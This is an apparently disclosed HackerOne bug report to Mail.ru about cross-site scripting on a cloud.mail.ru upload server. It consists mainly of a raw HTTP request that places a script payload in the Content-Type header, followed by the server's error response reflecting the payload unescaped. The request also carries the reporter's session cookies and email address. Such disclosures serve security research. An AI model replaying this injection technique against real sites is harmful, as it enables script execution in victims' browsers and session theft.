ReportLink:https://hackerone.com/reports/20720
WeaknessName:Cross-site Scripting (XSS) - Generic
Reporter:https://hackerone.com/isox
ReportedTo:Mail.ru(mailru)
BountyAmount:150.0
Severity:
State:Closed
DateOfDisclosure:13.09.2015 12:10:54

Summary:

Можно еще вот так сделать.

POST /upload/B1BA0E3F65D7EAA994C0EA6386E014EB569EA5E1.html?fileapi14057587543286 HTTP/1.1
Host: cloclo9-upload.cloud.mail.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://cloud.mail.ru/
Content-Length: 216
Content-Type: text/html; charset=<html><script>alert(1);</script></html>
Origin: https://cloud.mail.ru
Cookie: mrcu=C3EB52FA632E5958028A5821010A; p=8BkAAFHOkAAA; VID=3grP2o1i30nF:; s=fver=14|geo=2582|georb=70|geol1=188|rt=1|dpr=2; i=AQASK8pTBwATAAgiC3QAASMBAWQBAY8BARkCAe4CAbkDAdwEAvQEAQAGARonAV0ABQIBAKgACAcCBQABvgABqgAIBwIFAAG+AAHJAAUCAfzvAQgEAQEAAVgDCAQBAQAB; b=jT8LAHDkeAQA4gTmwbk1JZxTtYiCXIUQAAAQcqdQwl8SSbjIRwiJVSjiKKlFfCW1iLvfAhDuB26IyGcJByKnQFQE8dVJEkT+GsoYF1crQbcTVQQ9Lp8xxo4mSyiHMiSh/AArhJKlUhB46F5BAAAA; searchuid=9987040291391447473; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAQAAACAAAID3gcA; _ga=GA1.2.145097379.1400943163; s_cp=dpr=2; c=/SzKUwAAABotDgATAQAA8gAAAQAA; mc1=1405758723; optimizelySegments=%7B%221363374953%22%3A%22direct%22%2C%221379862954%22%3A%22ff%22%2C%221356673191%22%3A%22false%22%7D; optimizelyEndUserId=oeu1404747734356r0.5230243679244354; optimizelyBuckets=%7B%7D; Mpop=1405758658:7d64545a7f450b5a19050219081d000c1c0c054f6a5d5e465e030307071d01017518584a564010595f555a4f1b4341:isox@inbox.ru:; mc2=parapa.mail.ru; mr1ladid=1_1000043_1000475_0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------810340597531245051657842030
Content-Disposition: form-data; name="file"; filename="1px_html.jpg"
Content-Type: image/jpeg

-----------------------------810340597531245051657842030--



HTTP/1.1 400 Bad Request
Server: Tengine/2.0.0
Date: Sat, 19 Jul 2014 08:38:41 GMT
Content-Length: 84
Connection: keep-alive
Keep-Alive: timeout=20

unsupported content type: text/html; charset=<html><script>alert(1);</script></html>